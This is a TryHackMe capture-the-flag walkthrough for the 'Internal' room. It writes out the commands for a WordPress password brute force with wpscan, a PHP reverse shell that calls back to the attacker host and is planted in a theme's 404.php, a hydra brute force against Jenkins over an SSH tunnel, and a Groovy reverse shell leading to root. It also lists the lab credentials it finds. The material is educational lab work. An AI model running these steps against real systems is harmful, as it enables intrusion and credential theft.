TryHackMe – How I Used WPScan to Extract Login Credentials (WordPress)

CHALLENGE OVERVIEW

TryHackMe - How I Used WPScan to Extract Login Credentials (WordPress)

• CTF Creator: TheMayor
• Link: https://tryhackme.com/room/internal
• Difficulty: Hard
• Target: Root/User flags
• Highlight: Enumerating a wordpress site with wpscan
• Tools used: pentest.ws, hydra, nmap, dirb, linpeas, ssh with port forwarding
• Tags: CTF, security, accessible, pentest, blackbox

BACKGROUND

This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address.

We will have to discover ports and services running on the server with our standard pentesting tools like nmap and dirb scan. We also don’t have any inside information about the backend of the target machine.

Let’s get started!

We’ll be testing out the website pentest.ws during today’s video walkthrough.

It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports).

At the end of this post, I will summarize my thoughts on using pentest.ws for the first time.

ENUMERATION/RECON

sudo nmap -A -oX nmap.txt $targetIP -p-

Today we are exporting our nmap results in XML format so that we can upload them to pentest.ws and have the site automatically parse our findings.

dirb http://$targetIP -o dirb.txt

We discovered a WordPress login at: http://internal.thm/blog/wp-login.php

USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS

Let’s use wpscan to discover the admin’s email and password for WordPress.

wpscan --url 10.10.61.252/blog -e vpn,u -o wpscan.txt

Now that we found a username, we can run wpscan again with a wordlist to brute-force the password.

wpscan --url 10.10.61.262/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt

We found the admin email and password!

admin:my2boys

Now we can log into WordPress and look for a place to upload a revshell.

INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP

We’ll edit the template for 404.php and drop in a revshell created quickly and easily with EzpzShell.py.

If you want to learn more about ezpzshell, check out my previous blog post:

👉 Learn More: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation

ezpz 10.6.2.23 8888 php (ezpzshell also automatically starts a listener)

After copying the payload to 404.php, we make sure it is saved and then trigger the payload:

http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php

And if everything is set up correctly, we will catch the revshell with ezpz as user: www-data.

STABILIZE THE SHELL

The following command will stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

INTERNAL ENUMERATION – FIND USER CREDS

We discover a txt file with credentials:

cat wp-save.txt 
Bill,
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
aubreanna:bubb13guM!@#123

Let’s try switching users to aubreanna with the password given in wp-save.txt.

su aubreanna

We are in as user aubreanna and immediately find the user flag.

aubreanna@internal:~$ cat us	
cat user.txt 
THM{i—------omitted--------1}

MORE ENUMERATION – DISCOVER A JENKINS SERVICE

cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

SET UP PORT FORWARDING VIA SSH LOGIN

ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252

SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the Jenkins login page in our browser.

BRUTE-FORCE THE LOGIN

hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'

The payload on this command has three parts:

1. http-post-form + header
2. the request, edited with admin as the username and ^PASS^ in place of the password to mark it as the variable for the password wordlist
3. the error message that the website will return with a wrong password 

Output:

Using burpsuite or developer mode on firefox will allow us to extract these strings and modify it to our final hydra payload.
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
\
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10

Credentials found! admin:spongebob

ENUMERATING JENKINS AS ADMIN

We’ll use the script console on Jenkins to spawn another revshell using groovy scripting language.

We’ll use ezpzshell and choose the Java code, because groovy is built on Java. This time when we catch it, we will be user jenkins.

Manually enumerating through the file system we stumble across a note.txt. Let’s check out the contents:

cat note.txt

Output:

Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you need access to the root user account.

root:tr0ub13guM!@#123

Bingo! We found root user credentials! 

SWITCH USERS TO ROOT

su root
root@internal:~# cat root.txt
THM{d—-omitted—3r}

FINAL THOUGHTS

I’m not convinced yet that pentest.ws will save me much time on my note taking. Maybe with time and experience it would help.

I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform.

However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords.

Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.

👉 Recommended: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation